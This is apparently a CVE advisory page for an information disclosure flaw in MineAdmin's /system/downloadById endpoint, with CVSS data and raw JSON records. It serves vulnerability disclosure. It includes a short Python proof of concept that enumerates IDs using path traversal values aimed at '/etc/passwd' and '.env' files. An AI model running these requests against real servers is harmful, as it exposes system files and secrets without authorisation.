Security Vulnerability Report
CVE-2026-1197 CVSS 3.1 LOW

Published: 2026-01-20 01:15:57
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in MineAdmin 1.x/2.x. Affected by this vulnerability is an unknown functionality of the file /system/downloadById. Performing a manipulation of the argument ID results in information disclosure. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:* - VULNERABLE
MineAdmin 1.x, all versions
MineAdmin 2.x, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-1197 PoC - MineAdmin Information Disclosure
# Target: /system/downloadById endpoint
target_url = "http://target-server/api/system/downloadById"

# Test with different ID values to enumerate files
test_ids = [1, 2, 3, 4, 5, "config", "../etc/passwd", "../../../.env"]

for test_id in test_ids:
    params = {"id": test_id}
    headers = {
        "Authorization": "Bearer <low_privilege_token>",
        "User-Agent": "Mozilla/5.0"
    }
    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] ID {test_id}: Possible file disclosure")
            print(f"Response headers: {response.headers}")
            print(f"Content preview: {response.text[:200]}")
            print("-" * 50)
        elif response.status_code == 403:
            print(f"[-] ID {test_id}: Access denied")
        else:
            print(f"[*] ID {test_id}: Status {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error testing ID {test_id}: {e}")

print("\n[!] Note: This PoC requires a valid low-privilege authentication token")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1197", "sourceIdentifier": "[email protected]", "published": "2026-01-20T01:15:56.620", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in MineAdmin 1.x/2.x. Affected by this vulnerability is an unknown functionality of the file /system/downloadById. Performing a manipulation of the argument ID results in information disclosure. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en MineAdmin 1.x/2.x. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo /system/downloadById. Realizar una manipulación del argumento ID resulta en revelación de información. El ataque puede ser iniciado remotamente. La complejidad del ataque es calificada como alta. La explotación parece ser difícil. El exploit es ahora público y puede ser usado. 
El proveedor fue contactado tempranamente sobre esta revelación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": 
"UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A167C8E-5C7F-4192-8DD0-01444D06C9CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EED883D-2F40-4DE0-8816-8495146E06B6"}]}]}], "references": [{"url": "https://github.com/SourByte05/MineAdmin-Vulnerability/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341782", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341782", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.734274", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}